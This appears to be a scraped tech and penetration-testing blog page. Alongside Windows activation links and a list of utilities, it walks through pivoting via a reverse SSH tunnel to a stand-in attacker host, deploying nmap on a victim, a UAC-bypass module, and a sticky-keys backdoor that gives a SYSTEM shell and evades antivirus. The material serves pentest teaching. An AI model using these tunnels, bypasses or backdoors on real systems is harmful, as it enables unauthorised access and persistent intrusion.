Very worthwhile to checkout!
http://blog.win-fu.com/2016/11/every-windows-10-in-place-upgrade-is.html
Very worthwhile to checkout!
http://blog.win-fu.com/2016/11/every-windows-10-in-place-upgrade-is.html
#Update 10/7/2015 It appears that IE9 and IE10 will not work on these activation URLs but google-chrome and the like seem to work.
Are you ever tired of having to call Microsoft’s automated system to activate your Windows install? Use this URL instead, it’s ten times faster after you have your installation ID window up (accessible via slui.exe 4 in the run prompt):
#Update 7/30/2015
Should you have problems with that URL, try this one:
#Update 3/31/2016
New URL to use: http://bit.ly/1q60R3W
#update 6/8/2018
New URL to use: http://m.vivr.io/mUJ1zm3
#update 6/21/2018
Doesn’t seem to work anymore and you need to call their automated phone system and get a unique URL each time.
Ah… WINKEY+R and cmd.exe, two awesome means of launching programs and commands within a Windows environment. In my humble opinion, WINKEY+R is probably one of the best keyboard shortcuts to know, especially if you work in the tech industry. I mention this because I find myself using this keyboard shortcut a lot and it’s nice just to call out the name of a program rather than hunting around for it in a GUI. Need to see trace route for google.com? WINKEY+R then tracert www.google.com. Need to do a force shutdown? WINKEY+R then shutdown -s -t 0 -f . The list goes on but today we will be adding to this list because we all know that there are a myriad of utilities out there that don’t come with Windows installations by default and it’s nice to have them sitting in your System32 directory or in your %PATH% variable to quickly execute. I will warn you that some of the utilities I will recommend may make it easier for your system to be used as a pivot point if your system gets compromised. Additionally some of these tools may be detected as ‘viruses’ by anti-virus programs. Lastly, this article isn’t a comprehensive list of ALL the utilities that could be added or desired. It’s merely a means of getting you started. With that being said, let’s continue.
Cygwin:
For those of you who want to give your Windows system more a UNIX/Linux feel, I strongly recommend installing Cygwin and customizing your install to have all the Unix based goodies that your little heart desires. Once you’ve done this, add the /bin/ directory to your %PATH% variable. Now you can use egrep instead of findstr. Also you can now use wget, curl, ssh utilities suite, netcat, perl and other powerful scripting languages from cmd.exe! (Provided you have selected to install these during the customization part of your Cygwin install.)
Sysinternals Tools:
Mark Russinovich deserves a medal of some sort. Practically every tool he makes for Windows is a must have if you work on Windows systems. So feel free to download and copy all of these .exe files to your System32 directory:
https://technet.microsoft.com/en-us/sysinternals/bb842062.aspx
I personally use autoruns.exe all the time as a much greater alternative to msconfig and hijackthis.
Putty software suite:
If you forgot to install the ssh utilities under Cygwin, don’t worry and put these in your System32 directory:
http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html
Other useful tools to have:
Here’s a list of some other tools that are very useful to have in your System32 directory:
Bluescreenview – great utility for getting information on BSODs
coretemp – (pretty self explanatory)
cpuz– very useful tool for getting information about your CPU, Motherboard, and RAM
fciv – Microsoft’s hash checksum utility
gpuz – like cpuz but for graphics cards
p95 –useful tool to benchmark your system
rufus -Create bootable USB drives with picky distros (not all work with YUMI)
Speccy -great alternative to msinfo32 that is better in some departments
usbdeview -useful for getting information about usb devices that have been plugged into your system
YUMI – create multi linux distro and OS bootable flash drives (see: http://zitstif.no-ip.org/?p=973 )
Of course this list isn’t complete but I strongly feel that this is a good start. If you feel inclined to suggest some tools/utilities to add to the list feel free to leave a comment or send me an email.
Using a ‘trusted’ host that you have compromised as leverage during a pentest, is nearly always advantageous. I personally believe that the steps of pentesting change in a sense, once you have a session on a computer in an internal network from an external computer.
I would revert back to reconnaissance (depending on the circumstances), since the point of view has changed. The hijacked host is “your man on the inside”, and what a better way to give the ‘man on the inside’ some ‘eyes’ by deploying and using nmap!
One means of using nmap through the compromised host includes:
1.) Deploying an openssh server on the victim machine
2.) Setting up an account
3.) Reversing an ssh session like so: ssh -R 2222:localhost:22 attacker@attackersbox.com
4.) Then you would connect back to the victim using a socks5 proxy: ssh -D 9050 victimaccount@localhost -p 2222
5.) Lastly, you would use nmap and proxychains from the attacker’s host to scan hosts internally through a tunnel between you and the victim machine.
Keep in mind that the Metasploit framework has an auxiliary module “auxiliary/scanner/portscan”, which you can use but let me be quite frank, it doesn’t compare to what is known as the ‘king of all port scanners’ nmap. (No offense Metasploit crew.)
This is why I programmed a meterpreter script that downloads the latest stable version of nmap from www.insecure.org and then deploys nmap onto the victim’s machine. You could then use the victim’s machine to do vulnerability scanning with nmap’s scripting engine. (i.e. nmap –script=smb-check-vulns).
The script has a removal feature that will uninstall nmap and winpcap from the victim’s machine. Please e-mail me or comment if you have any questions, concerns or problems with the script.
NOTE: On versions of Microsoft Windows that use the UAC service, you will most likely need to disable or circumvent this service to successfully deploy nmap. Luckily there is a module with the Metasploit framework that will help you (post/windows/escalate/bypassuac).
http://zitstif.no-ip.org/meterpreter/stickykeys.txt
Through the past year or so, I’ve had some ideas for meterpreter scripts floating around in my head that I’ve been meaning to put to use. So this is my first unofficial meterpreter script for the Metasploit Framework.
The purpose of this script is to place a backdoor onto a Windows victim system. What it simply does is, copy cmd.exe over to sethc.exe. The sethc.exe program is the sticky keys program. To activate this program you just have to hit the shift key 5 times and sethc.exe will be executed.
While this can be useful for those who are disabled, there is also an abuse for this feature. If you have copied cmd.exe over to sethc.exe, you can then hit shift 5 times and be provided a shell.
If you’re at a log on prompt and if you have this backdoor placed, when you activate sethc.exe (instead of logging in) you get a shell with SYSTEM level privileges!
This may seem trivial, however if you’re doing a penetration test on a remote Windows system that is running remote desktop, this can be a deadly means for maintaining access. You can then use this as pivoting your way back into the system, even if the original means (say for instance http) is blocked by an IPS and/or firewall.
One truly beautiful facet about this method if you’re an attacker, is that cmd.exe renamed as sethc.exe did not trigger any responses from scanners on www.virustotal.com.
I’m planning on adding more to this script, but I just wanted to get this released for the time being. I also want to state that I just put this idea to use for the Metasploit project, this hack has been around for a while:
To install this, simply download the txt file, then change the extension to .rb and throw this file in the framework3/msf3/scripts/meterpreter/ directory.
#Update 7/20/2011
Issue Addressed: Switched all C:\\WINDOWS to %SYSTEMROOT% (Thanks Rod Macpherson )
BUG: On Nokia N900 with Ruby 1.8.7 (arm-linux-eabi), with Metasploit Framework version: svn r13268, I am receiving a compile error message at line 70. (Unexpected ‘)’ )
NOTE: I am not having this issue on Backtrack 5 32bit with Ruby 1.9.2dev (i686-linux)